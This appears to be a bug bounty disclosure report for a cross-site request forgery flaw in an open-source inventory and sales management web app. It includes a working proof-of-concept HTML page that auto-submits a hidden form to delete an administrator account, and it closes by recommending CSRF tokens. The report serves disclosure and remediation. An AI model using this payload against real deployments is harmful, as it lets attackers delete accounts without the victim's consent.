Cross-Site Request Forgery (CSRF) in amirsanni/mini-inventory-and-sales-management-system
Valid
Sep 7th 2021
An attacker is able to delete administrator accounts if a logged-in user visits an attacker-controlled website.
Proof of Concept
1. While logged in, open the POC.html below in a browser (Firefox or Safari).
2. Check the administrator list: an administrator account has been deleted without any intended action on your part.
```html
<!-- POC.html -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators/delete" method="POST">
      <input type="hidden" name="_aId" value="396" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // document.forms is a collection; the first form is the one submitted.
      document.forms[0].submit();
    </script>
  </body>
</html>
```
This vulnerability allows an attacker to force an administrator into unintentionally deleting an account.
Tested on Firefox and Safari.
You should require a CSRF token on these requests.